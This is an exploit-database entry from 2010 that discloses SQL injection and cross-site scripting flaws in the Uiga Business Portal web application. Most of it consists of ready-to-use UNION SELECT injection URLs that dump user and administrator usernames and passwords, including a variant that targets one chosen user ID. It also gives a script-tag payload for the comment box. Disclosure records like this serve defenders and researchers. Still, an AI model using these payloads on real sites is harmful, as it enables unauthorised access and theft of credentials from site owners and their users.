[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Uiga Business Portal SQL/ XSS Vulnerability
# Published : 2010-02-07
# Author : Sioma Labs
# Previous Title : Rostermain <= 1.1 (Auth Bypass) SQL Injection Vulnerability
# Next Title : TinyMCE WYSIWYG Editor Multiple Vulnerabilities
# Exploit Title: Uiga Business Portal SQL/ XSS Vulnerability
# Date: 8/2/2010
# Author: Sioma Labs
# Site : http://www.scriptdevelopers.net
# Software Link: http://www.scriptdevelopers.net/download/uigapersonalportal.zip
# Version: N/A
# Tested on:
Linux
OS = Cent OS 5.4
Server = Apache/2.2.3
SQLDB = MYSQL v5.0.77
Windows
OS = Windows XPsp2
App = Wamp
# CVE : N/A
# Code : N/A
----------------------------------------------------
__ _ __ _
/ _(_) ___ _ __ ___ __ _ / / __ _| |__ ___
| |/ _ | '_ ` _ / _` | / / / _` | '_ / __|
_ | (_) | | | | | | (_| | / /___ (_| | |_) __
__/_|___/|_| |_| |_|__,_| ____/__,_|_.__/|___/
----------------------------------------------------
SQL Injection Vulnerability
UserAge : [host]/blog/index.php?view=noentryid&noentryid=[SQLi]
- User SQLi ->
--------------
Ex : http://server/ulgabusinessportak/blog/index.php?view=noentryid&noentryid=-20+Union+All+Select+1,2,3,4,5,group_concat(user_id,0x3a,username,0x3a,password),7,8,9,10+from+tbl_user--
- Admin SQLi ->
---------------
Ex : http://server/ulgabusinessportak/index2.php?c=29&p=-45+Union+All+Select 1,group_concat(admin_id,0x3a,admin_name,0x3a,admin_password),3,4,5+from+admin--
- Or Choice By User ID ->
--------------------------
http://server/ulgabusinessportak/blog/index.php?view=noentryid&noentryid=-20+Union+All+select+1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10+from+tbl_user+where+user_id=1--
*/ Change the last User ID
#######################################################################################################
XSS Vulnerability
--------
- You can inject html with the comment box
Test Link
http://server/ulgabusinessportak/blog/index.php?view=noentryid&noentryid=20
Inject "<script>alert("XSS")</script>" into the portal using Comment Box
# Sioma Agent -154
# http://siomalabs.com